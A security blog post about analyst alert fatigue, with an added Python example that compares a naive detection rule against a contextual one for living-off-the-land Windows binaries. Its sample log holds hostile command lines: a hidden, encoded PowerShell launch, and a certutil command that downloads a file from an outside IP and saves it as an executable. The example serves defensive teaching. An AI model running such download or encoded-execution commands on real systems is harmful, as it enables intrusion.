October 4, 2021 By Amitai Ratzon
Security operations teams have been dealing with “alert fatigue” for far too long.
Log monitoring (e.g., SIEM), firewalls, and antivirus, introduced more than two decades ago, gave IT teams valuable tools for being alerted to known suspicious network behavior. Yet while digital transformation has accelerated to record levels, the underlying technologies that support security teams in their day-to-day operations have not fundamentally changed.
Distinguishing benign from malicious behavior is now harder than ever: attacks have grown more sophisticated, frequently rely on legitimate operating system tooling (living-off-the-land techniques), and blend into regular network activity. The problem is that not all suspicious behavior is malicious behavior, far from it. As a result, what was meant to provide a useful glimpse into network activity has become the bane of many security professionals.
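The living-off-the-land problem described above, as an added illustration that is not part of the original post: a toy process-creation log (constructed events with a simplified, hypothetical field schema, not any vendor's format) checked by two detection rules. The naive rule alerts on every execution of a dual-use binary and so fires on routine administration as well as on the attacks; the contextual rule keys on parent process and command-line indicators instead and fires only on the two suspicious events. The indicator lists are illustrative, not a complete or evasion-proof rule set.

```python
"""Added example, not code from the original post: why rules built on
legitimate OS tooling produce alert fatigue, and what precision buys.

All events below are constructed for illustration. Field names are a
simplified, hypothetical process-creation schema.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    parent: str   # parent process image name
    image: str    # launched process image name
    cmdline: str  # full command line


# Constructed sample telemetry: routine admin activity plus two suspicious
# chains, all using built-in Windows binaries. The encoded payload and the
# download URL are placeholders, not real samples.
EVENTS = [
    ProcessEvent("ws01", "alice", "explorer.exe", "powershell.exe",
                 r"powershell.exe -File C:\scripts\backup.ps1"),
    ProcessEvent("ws02", "bob", "cmd.exe", "certutil.exe",
                 r"certutil.exe -hashfile C:\installer.msi SHA256"),
    ProcessEvent("ws03", "svc_patch", "services.exe", "powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\patch\deploy.ps1"),
    ProcessEvent("ws04", "carol", "winword.exe", "powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0A..."),
    ProcessEvent("ws05", "dave", "cmd.exe", "certutil.exe",
                 r"certutil.exe -urlcache -split -f http://203.0.113.10/a.txt C:\Users\Public\a.exe"),
    ProcessEvent("ws06", "erin", "explorer.exe", "powershell.exe",
                 "powershell.exe Get-Process"),
]

# Dual-use ("living off the land") binaries this toy rule set cares about.
LOLBINS = {"powershell.exe", "certutil.exe"}

# Office applications spawning a shell is rare in normal use.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}


def naive_rule(events):
    """Alert on any execution of a dual-use binary.

    Catches both attacks, but also fires on every routine use, which is
    exactly the noise that wears analysts down."""
    return [e for e in events if e.image.lower() in LOLBINS]


def contextual_rule(events):
    """Alert only when a dual-use binary appears with context that routine
    administration rarely shows: an Office parent, an encoded or hidden
    PowerShell invocation, or certutil used as a downloader."""
    hits = []
    for e in events:
        image = e.image.lower()
        cmd = e.cmdline.lower()
        if image == "powershell.exe":
            if (e.parent.lower() in OFFICE_PARENTS
                    or " -enc" in cmd        # -enc / -EncodedCommand
                    or "-w hidden" in cmd):  # -WindowStyle Hidden
                hits.append(e)
        elif image == "certutil.exe":
            if "-urlcache" in cmd or "http://" in cmd or "https://" in cmd:
                hits.append(e)
    return hits


def alert_counts(events):
    """Alert volume per rule, the number an on-call analyst actually feels."""
    return {"naive": len(naive_rule(events)),
            "contextual": len(contextual_rule(events))}


if __name__ == "__main__":
    print(alert_counts(EVENTS))
    for hit in contextual_rule(EVENTS):
        print(f"ALERT {hit.host} {hit.user}: {hit.parent} -> {hit.cmdline}")
```

Over these six events the naive rule raises six alerts, four of them on legitimate administration; the contextual rule raises two, both on the suspicious chains. The same tradeoff plays out at scale: the rule that only asks "was a dual-use binary run?" is the one that buries the real incident in a queue of benign hits.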